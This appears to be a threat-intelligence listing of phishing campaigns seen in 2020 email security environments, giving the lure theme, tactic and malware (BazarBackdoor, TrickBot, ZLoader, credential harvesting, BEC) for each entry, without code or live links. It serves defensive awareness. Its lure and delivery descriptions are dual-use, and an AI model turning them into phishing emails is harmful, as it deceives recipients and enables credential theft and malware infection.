PHISHING EXAMPLE DESCRIPTION: Emails themed around employment termination due to COVID-19 or an annual bonus, seen in Proofpoint environments, deliver PDF documents via embedded URLs. The PDF documents contain links to download BazarBackdoor.

Real Phishing Example: Attachment-themed emails in Proofpoint environments to deliver NanoCore RAT via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Attachment

PHISHING EXAMPLE DESCRIPTION: Attachment-themed emails in Proofpoint environments to deliver NanoCore RAT via an embedded URL.

Real Phishing Example: Purchase Order-themed email in Proofpoint environments to deliver Credential Phishing via attached HTM files. The attached HTM files harvest Adobe login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/16/2020

TACTIC: HTM Attachment

THEME: Purchase Order

PHISHING EXAMPLE DESCRIPTION: Purchase Order-themed email in Proofpoint environments to deliver Credential Phishing via attached HTM files. The attached HTM files harvest Adobe login credentials.

Real Phishing Example: Legal Action-themed emails in Proofpoint environments to deliver Remcos RAT via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Legal

PHISHING EXAMPLE DESCRIPTION: Legal Action-themed emails in Proofpoint environments to deliver Remcos RAT via an embedded URL.

Real Phishing Example: Insider details-themed emails in Proofpoint environments to deliver ZLoader via an Office macro-laden spreadsheet downloaded from an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Insider

PHISHING EXAMPLE DESCRIPTION: Insider details-themed emails in Proofpoint environments to deliver ZLoader via an Office macro-laden spreadsheet downloaded from an embedded URL.

Real Phishing Example: Order-themed emails in Proofpoint environments to deliver AZORult Stealer via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Order

PHISHING EXAMPLE DESCRIPTION: Order-themed emails in Proofpoint environments to deliver AZORult Stealer via an embedded URL.

Real Phishing Example: Order-themed emails in Proofpoint environments to deliver Quaverse Remote Access Trojan.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/09/2020

TACTIC: JAR Attachment

PHISHING EXAMPLE DESCRIPTION: Order-themed emails in Proofpoint environments to deliver Quaverse Remote Access Trojan.

Real Phishing Example: Information-themed emails in O365-ATP environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in O365-ATP environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Information-themed emails in Mimecast environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in Mimecast environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Information-themed emails in Proofpoint environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in Proofpoint environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Information-themed emails in TrendMicro environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: TrendMicro

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in TrendMicro environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Information-themed emails in Ironport environments to deliver BazarBackdoor via embedded URLs.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Information

PHISHING EXAMPLE DESCRIPTION: Information-themed emails in Ironport environments to deliver BazarBackdoor via embedded URLs.

Real Phishing Example: Finance-themed emails in O365-ATP environments to deliver Mispadu banking trojan via embedded URLs. Note: These emails are in Spanish.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in O365-ATP environments to deliver Mispadu banking trojan via embedded URLs. Note: These emails are in Spanish.

Real Phishing Example: Finance-themed emails in Proofpoint environments to deliver Agent Tesla Keylogger via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environments to deliver Agent Tesla Keylogger via an embedded URL.

Real Phishing Example: Finance-themed emails in O365-ATP environments to deliver ZLoader via a VBS downloader dropped by an Office macro-laden spreadsheet.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/09/2020

TACTIC: XLS Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in O365-ATP environments to deliver ZLoader via a VBS downloader dropped by an Office macro-laden spreadsheet.

Real Phishing Example: Coronavirus-themed emails in Symantec environments to deliver BazarBackdoor and ZLoader via embedded URLs. The embedded URLs download Office macros that download and run a BazarBackdoor or ZLoader binary.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Coronavirus

PHISHING EXAMPLE DESCRIPTION: Coronavirus-themed emails in Symantec environments to deliver BazarBackdoor and ZLoader via embedded URLs. The embedded URLs download Office macros that download and run a BazarBackdoor or ZLoader binary.

Real Phishing Example: Eunmin-spoofing emails in Proofpoint environments to deliver NetWire RAT via GuLoader. GuLoader is downloaded from an embedded link.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Eunmin-spoofing emails in Proofpoint environments to deliver NetWire RAT via GuLoader. GuLoader is downloaded from an embedded link.

Real Phishing Example: Political-themed emails in Symantec environments to deliver BazarBackdoor and ZLoader via embedded URLs. The embedded URLs download Office macros that download and run a BazarBackdoor or ZLoader binary.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Political

PHISHING EXAMPLE DESCRIPTION: Political-themed emails in Symantec environments to deliver BazarBackdoor and ZLoader via embedded URLs. The embedded URLs download Office macros that download and run a BazarBackdoor or ZLoader binary.

Real Phishing Example: Employee termination-themed emails in Symantec environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in Symantec environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: SAS International Marine Services-spoofing emails found in Cisco Ironport environments to deliver Mass Logger.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: Attachment EXE

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: SAS International Marine Services-spoofing emails found in Cisco Ironport environments to deliver Mass Logger.

Real Phishing Example: DHL-spoofing campaign in Microsoft ATP environments to deliver attached HTML files. The HTML files harvest email login credentials.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: HTML Attachment

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: DHL-spoofing campaign in Microsoft ATP environments to deliver attached HTML files. The HTML files harvest email login credentials.

Real Phishing Example: Employee termination-themed emails in O365-ATP environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in O365-ATP environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: Finance-themed emails in Mimecast environments to deliver NetWire RAT via embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Payment

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Mimecast environments to deliver NetWire RAT via embedded URLs.

Real Phishing Example: HSBC-spoofing emails in Ironport environments to deliver Agent Tesla keylogger via embedded OneDrive URLs. The OneDrive URLs download a .ZIP archive that contains an Agent Tesla executable.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: HSBC-spoofing emails in Ironport environments to deliver Agent Tesla keylogger via embedded OneDrive URLs. The OneDrive URLs download a .ZIP archive that contains an Agent Tesla executable.

Real Phishing Example: Employee termination-themed emails in Mimecast environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in Mimecast environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: Finance-themed emails in Proofpoint environments to deliver Credential Phishing via embedded OneDrive URLs. The OneDrive URLs host a OneNote document that redirects to a phishing URL. The phishing URL harvests login credentials for multiple email providers.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environments to deliver Credential Phishing via embedded OneDrive URLs. The OneDrive URLs host a OneNote document that redirects to a phishing URL. The phishing URL harvests login credentials for multiple email providers.

Real Phishing Example: Finance-themed emails in Proofpoint environments to deliver ZLoader via a VBS downloader dropped by an Office macro-laden spreadsheet. The spreadsheet is downloaded from an embedded link.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environments to deliver ZLoader via a VBS downloader dropped by an Office macro-laden spreadsheet. The spreadsheet is downloaded from an embedded link.

Real Phishing Example: Employee termination-themed emails in Proofpoint environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in Proofpoint environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: Confirmation-themed emails spoofing Salesforce, found in Proofpoint environments, deliver Credential Phishing via embedded URLs. This campaign has been seen targeting multiple sectors.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Confirmation

PHISHING EXAMPLE DESCRIPTION: Confirmation-themed emails spoofing Salesforce, found in Proofpoint environments, deliver Credential Phishing via embedded URLs. This campaign has been seen targeting multiple sectors.

Real Phishing Example: Finance-themed emails in Microsoft ATP environments to deliver ZLoader via a VBS downloader dropped by an Office macro-laden spreadsheet. The spreadsheet is downloaded from an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Microsoft ATP environments to deliver ZLoader via a VBS downloader dropped by an Office macro-laden spreadsheet. The spreadsheet is downloaded from an embedded link.

Real Phishing Example: Employee termination-themed emails in TrendMicro environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

ENVIRONMENTS: TrendMicro

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Employee

PHISHING EXAMPLE DESCRIPTION: Employee termination-themed emails in TrendMicro environments to deliver BazarBackdoor and Buer Loader via embedded URLs.

Real Phishing Example: Confirmation-themed emails spoofing Salesforce, found in Proofpoint and O365-ATP environments, deliver Credential Phishing via embedded URLs. This campaign has been seen target

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Confirmation

PHISHING EXAMPLE DESCRIPTION: Confirmation-themed emails spoofing Salesforce, found in Proofpoint and O365-ATP environments, deliver Credential Phishing via embedded URLs. This campaign has been seen target

Real Phishing Example: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Mimecast environments to deliver Buer Loader via an embedded URL.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Mimecast environments to deliver Buer Loader via an embedded URL.

Real Phishing Example: Finance-themed email in Proofpoint environments to deliver Agent Tesla Keylogger via a CVE-2017-0199 to CVE-2017-11882 download chain.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: XLS Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed email in Proofpoint environments to deliver Agent Tesla Keylogger via a CVE-2017-0199 to CVE-2017-11882 download chain.

Real Phishing Example: North Country HealthCare-spoofing emails in Proofpoint environments to deliver Credential Phishing via embedded URLs. The embedded URLs redirect to a phishing URL that harvests email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Health

PHISHING EXAMPLE DESCRIPTION: North Country HealthCare-spoofing emails in Proofpoint environments to deliver Credential Phishing via embedded URLs. The embedded URLs redirect to a phishing URL that harvests email login credentials.

Real Phishing Example: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Proofpoint environments to deliver Buer Loader via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Proofpoint environments to deliver Buer Loader via an embedded URL.

Real Phishing Example: Hamahang Daryaye Pars-spoofing emails in Ironport environments to deliver Mass Logger.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: EXE Attachment

THEME: Confirmation

PHISHING EXAMPLE DESCRIPTION: Hamahang Daryaye Pars-spoofing emails in Ironport environments to deliver Mass Logger.

Real Phishing Example: North Country HealthCare-spoofing emails in Mimecast environments to deliver Credential Phishing via embedded URLs. The embedded URLs redirect to a phishing URL that harvests email login credentials.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Health

PHISHING EXAMPLE DESCRIPTION: North Country HealthCare-spoofing emails in Mimecast environments to deliver Credential Phishing via embedded URLs. The embedded URLs redirect to a phishing URL that harvests email login credentials.

Real Phishing Example: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Symantec environments to deliver Buer Loader via an embedded URL.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: Emails spoofing the IRS and the NY Dept of Taxation and Finance in Symantec environments to deliver Buer Loader via an embedded URL.

Real Phishing Example: SNCF-spoofing emails in Proofpoint environments to deliver JavaScript files via embedded URLs. The JavaScript files drop and run MoDi RAT.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Confirmation

PHISHING EXAMPLE DESCRIPTION: SNCF-spoofing emails in Proofpoint environments to deliver JavaScript files via embedded URLs. The JavaScript files drop and run MoDi RAT.

Real Phishing Example: Citi-spoofing emails in Symantec environments to deliver STR RAT and Quaverse Remote Access Trojan via embedded URLs. The embedded URLs download a ZIP archive containing two JAR files, one for each RAT.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Citi

PHISHING EXAMPLE DESCRIPTION: Citi-spoofing emails in Symantec environments to deliver STR RAT and Quaverse Remote Access Trojan via embedded URLs. The embedded URLs download a ZIP archive containing two JAR files, one for each RAT.

Real Phishing Example: Fidelity-spoofing emails in Symantec environments to deliver credential phishing via an embedded link.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Fidelity-spoofing emails in Symantec environments to deliver credential phishing via an embedded link.

Real Phishing Example: Microsoft-spoofing emails in Proofpoint environments to deliver Credential Phishing via embedded URLs. The embedded URLs harvest Microsoft email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: URL Link

THEME: Microsoft

PHISHING EXAMPLE DESCRIPTION: Microsoft-spoofing emails in Proofpoint environments to deliver Credential Phishing via embedded URLs. The embedded URLs harvest Microsoft email login credentials.

Real Phishing Example: Response-themed emails in O365-ATP environments to deliver QakBot via Office macros.
Note: the original email content was removed for this image.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 09/21/2020

TACTIC: XLS Attachment

THEME: Response

PHISHING EXAMPLE DESCRIPTION: Response-themed emails in O365-ATP environments to deliver QakBot via Office macros. Note: the original email content was removed for this image.

Real Phishing Example: This purchase order-themed phish delivers a link that leads to a NanoCore Remote Access Trojan installer.

ENVIRONMENTS: Proofpoint

TYPE: NanoCore

POSTED ON: 09/17/2020

TACTIC: Link

THEME: Purchase Order

PHISHING EXAMPLE DESCRIPTION: This purchase order-themed phish delivers a link that leads to a NanoCore Remote Access Trojan installer.

Real Phishing Example: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

ENVIRONMENTS: Proofpoint

TYPE: TrickBot

POSTED ON: 09/15/2020

TACTIC: Attachment-DOC

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

Real Phishing Example: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

ENVIRONMENTS: Ironport

TYPE: TrickBot

POSTED ON: 09/15/2020

TACTIC: Attachment-DOC

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

Real Phishing Example: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

ENVIRONMENTS: Mimecast

TYPE: TrickBot

POSTED ON: 09/15/2020

TACTIC: Attachment-DOC

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers an attached Microsoft Office document that uses macros to deliver a set of VBS scripts to install TrickBot.

Real Phishing Example: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

ENVIRONMENTS: Symantec

TYPE: Hentai OniChan Ransomware

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

Real Phishing Example: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

ENVIRONMENTS: Ironport

TYPE: Hentai OniChan Ransomware

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

Real Phishing Example: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Hentai OniChan Ransomware

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

Real Phishing Example: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

ENVIRONMENTS: Proofpoint

TYPE: Reconnaissance

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Illness

PHISHING EXAMPLE DESCRIPTION: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

Real Phishing Example: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

ENVIRONMENTS: Symantec

TYPE: Reconnaissance

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Illness

PHISHING EXAMPLE DESCRIPTION: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

Real Phishing Example: This BEC uses a task theme to lure the recipient into responding to execute the attack.

ENVIRONMENTS: Ironport

TYPE: BEC

POSTED ON: 09/14/2020

TACTIC: BEC

THEME: Task

PHISHING EXAMPLE DESCRIPTION: This BEC uses a task theme to lure the recipient into responding to execute the attack.

Real Phishing Example: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

ENVIRONMENTS: Mimecast

TYPE: Reconnaissance

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Illness

PHISHING EXAMPLE DESCRIPTION: This campaign uses multiple themes. This example uses an illness theme to deliver links to install reconnaissance tools.

Real Phishing Example: This email uses a business proposal theme with embedded links that lead to a credential harvesting site.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Proposal

PHISHING EXAMPLE DESCRIPTION: This email uses a business proposal theme with embedded links that lead to a credential harvesting site.

Real Phishing Example: This fax-themed phish delivers links to a credential harvesting website.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Fax

PHISHING EXAMPLE DESCRIPTION: This fax-themed phish delivers links to a credential harvesting website.

Real Phishing Example: This BEC lures the recipient into providing sensitive tax information.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: BEC

POSTED ON: 09/14/2020

TACTIC: BEC

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: This BEC lures the recipient into providing sensitive tax information.

Real Phishing Example: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

ENVIRONMENTS: Proofpoint

TYPE: Hentai OniChan Ransomware

POSTED ON: 09/14/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers links to either directly, or via a .html file, download the Hentai OniChan ransomware.

Real Phishing Example: Using a document theme, this attack uses Microsoft OneDrive links to host credential stealing web pages.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/11/2020

TACTIC: Link

THEME: Document

PHISHING EXAMPLE DESCRIPTION: Using a document theme, this attack uses Microsoft OneDrive links to host credential stealing web pages.

Real Phishing Example: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

ENVIRONMENTS: Proofpoint

TYPE: Reconnaissance

POSTED ON: 09/11/2020

TACTIC: Attachment-HTML

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

Real Phishing Example: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

ENVIRONMENTS: Mimecast

TYPE: Reconnaissance

POSTED ON: 09/11/2020

TACTIC: Attachment-HTML

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

Real Phishing Example: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Reconnaissance

POSTED ON: 09/11/2020

TACTIC: Attachment-HTML

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This bonus-themed phish delivers an attached .html file that leads to a macro-laden Microsoft Office document delivering a reconnaissance tool.

Real Phishing Example: This BEC attack uses gift cards to extract money from the recipient.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: BEC

POSTED ON: 09/11/2020

TACTIC: BEC

THEME: Gift Card

PHISHING EXAMPLE DESCRIPTION: This BEC attack uses gift cards to extract money from the recipient.

Real Phishing Example: This task-themed BEC uses a funeral as the lure to get the recipient to respond.

ENVIRONMENTS: Symantec

TYPE: BEC

POSTED ON: 09/11/2020

TACTIC: BEC

THEME: Task

PHISHING EXAMPLE DESCRIPTION: This task-themed BEC uses a funeral as the lure to get the recipient to respond.

Real Phishing Example: This phish uses a project theme to lure the recipient into accessing a macro-laden Microsoft Office spreadsheet to deliver TrickBot first and then BazarBackdoor.

ENVIRONMENTS: Proofpoint

TYPE: TrickBot

POSTED ON: 09/11/2020

TACTIC: Attachment-XLS

THEME: Project

PHISHING EXAMPLE DESCRIPTION: This phish uses a project theme to lure the recipient into accessing a macro-laden Microsoft Office spreadsheet to deliver TrickBot first and then BazarBackdoor.

Real Phishing Example: This task-themed BEC lures the recipient into responding.

ENVIRONMENTS: Mimecast

TYPE: BEC

POSTED ON: 09/10/2020

TACTIC: BEC

THEME: Task

PHISHING EXAMPLE DESCRIPTION: This task-themed BEC lures the recipient into responding.

Real Phishing Example: This invoice-themed attack delivers a link to Google Drive that will download a VBS Loader to install the WSH Remote Access Trojan.

ENVIRONMENTS: Proofpoint

TYPE: WSH RAT

POSTED ON: 09/10/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed attack delivers a link to Google Drive that will download a VBS Loader to install the WSH Remote Access Trojan.

Real Phishing Example: This phish uses a bonus theme to deliver the BazarBackdoor malware by way of Google Docs links.

ENVIRONMENTS: Mimecast

TYPE: BazarBackdoor

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This phish uses a bonus theme to deliver the BazarBackdoor malware by way of Google Docs links.

Real Phishing Example: This phish uses a bonus theme to deliver the BazarBackdoor malware by way of Google Docs links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: BazarBackdoor

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Bonus

PHISHING EXAMPLE DESCRIPTION: This phish uses a bonus theme to deliver the BazarBackdoor malware by way of Google Docs links.

Real Phishing Example: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

ENVIRONMENTS: Proofpoint

TYPE: Ursnif

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

Real Phishing Example: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

ENVIRONMENTS: Ironport

TYPE: Ursnif

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

Real Phishing Example: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

ENVIRONMENTS: Symantec

TYPE: Ursnif

POSTED ON: 09/09/2020

TACTIC: Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: This response-themed phish delivers embedded links that will lead to a password-protected .zip archive containing VBS Droppers to run Ursnif.

Real Phishing Example: This phish pretends to be a security awareness reminder but delivers a link to a credential harvesting site.

ENVIRONMENTS: Mimecast

TYPE: Credential Theft

POSTED ON: 09/08/2020

TACTIC: Link

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: This phish pretends to be a security awareness reminder but delivers a link to a credential harvesting site.

Real Phishing Example: This response-themed attack delivers a password-protected .zip archive containing a macro-laden Microsoft Office document with a .hta downloader for Iced-ID.

ENVIRONMENTS: Proofpoint

TYPE: Iced-ID

POSTED ON: 09/08/2020

TACTIC: Attachment-ZIP

THEME: Response

PHISHING EXAMPLE DESCRIPTION: This response-themed attack delivers a password-protected .zip archive containing a macro-laden Microsoft Office document with a .hta downloader for Iced-ID.

Real Phishing Example: This quotation-themed phish included a malicious link in the attached PDF that led to the AZORult Stealer malware.

ENVIRONMENTS: Proofpoint

TYPE: AZORult

POSTED ON: 09/07/2020

TACTIC: Attachment-PDF

THEME: Quotation

PHISHING EXAMPLE DESCRIPTION: This quotation-themed phish included a malicious link in the attached PDF that led to the AZORult Stealer malware.

Real Phishing Example: This invoice-themed phish hides a link behind an image that leads to a credential harvesting site.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/04/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish hides a link behind an image that leads to a credential harvesting site.

Real Phishing Example: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Pyrogenic Stealer

POSTED ON: 09/03/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

Real Phishing Example: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

ENVIRONMENTS: Symantec

TYPE: Pyrogenic Stealer

POSTED ON: 09/03/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

Real Phishing Example: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

ENVIRONMENTS: Proofpoint

TYPE: Pyrogenic Stealer

POSTED ON: 09/03/2020

TACTIC: Link

THEME: Invoice

